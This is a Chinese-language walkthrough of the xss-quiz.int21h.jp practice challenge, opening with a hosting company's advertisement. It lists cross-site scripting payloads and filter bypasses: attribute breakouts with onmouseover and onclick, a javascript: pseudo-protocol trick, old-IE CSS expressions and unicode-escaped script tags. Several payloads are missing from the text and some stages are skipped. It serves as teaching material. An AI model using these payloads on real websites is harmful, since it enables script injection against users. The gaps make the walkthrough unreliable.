這篇文章將為大家詳細(xì)講解有關(guān)XSS常見payload指的是什么，文章內(nèi)容質(zhì)量較高，因此小編分享給大家做個(gè)參考，希望大家閱讀完這篇文章后對相關(guān)知識有一定的了解。

目前創(chuàng)新互聯(lián)已為1000+的企業(yè)提供了網(wǎng)站建設(shè)、域名、雅安服務(wù)器托管、網(wǎng)站托管運(yùn)營、企業(yè)網(wǎng)站設(shè)計(jì)、信州網(wǎng)站維護(hù)等服務(wù)，公司將堅(jiān)持客戶導(dǎo)向、應(yīng)用為本的策略，正道將秉承"和諧、參與、激情"的文化，與客戶和合作伙伴齊心協(xié)力一起成長，共同發(fā)展。

環(huán)境：http://xss-quiz.int21h.jp

一、Stage #1 無過濾xss漏洞

1、隨便輸入字符：123

2、輸入payload：

二、Stage #2 屬性中的xss漏洞

1、在窗口中輸入payload：

，查看審查元素，payload被寫在一個(gè)標(biāo)簽中

或者 "onmouseover=alert(document.domain)>

三、Stage #3 選擇列表框中的xss漏洞

1、點(diǎn)擊search，抓包

2、修改post數(shù)據(jù)，添加payload：

，發(fā)送到repeater，send

四、隱藏提交參數(shù)的xss漏洞

">

1、隨便輸入字符，search，抓包

2、在隱藏參數(shù)后面添加payload，forward，查看審查元素

3、閉合參數(shù)，重新構(gòu)造payload：">

,發(fā)包，成功彈出

2、重新構(gòu)造payload："onmouseover="alert(document.domain)

或者">

3、成功彈出

六、空格分隔屬性中的xss漏洞

1、隨便輸入字符111 222 333

3、構(gòu)造payload：111 onclick=alert(document.domain)，成功彈出

八、繞過過濾xss漏洞

1、輸入payload：">

，審查元素，domain被過濾了

2、閉合payload，并修改100">

on事件，被替換成onxxx

3、使用偽協(xié)議加“ ”繞過

100"> xss

十、利用IE特性繞過過濾",``可以閉合雙引號， 

``onmousemove=alert(document.domain)

僅針對IE瀏覽器

十一、利用css特性繞過過濾",IE低版本

background-color:#f00;background:url(javascript:alert(document.domain););

十三、十六進(jìn)制繞過過濾

1、輸入

2、重新利用unicode構(gòu)造payload:

\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

關(guān)于XSS常見payload指的是什么就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，可以學(xué)到更多知識。如果覺得文章不錯(cuò)，可以把它分享出去讓更多的人看到。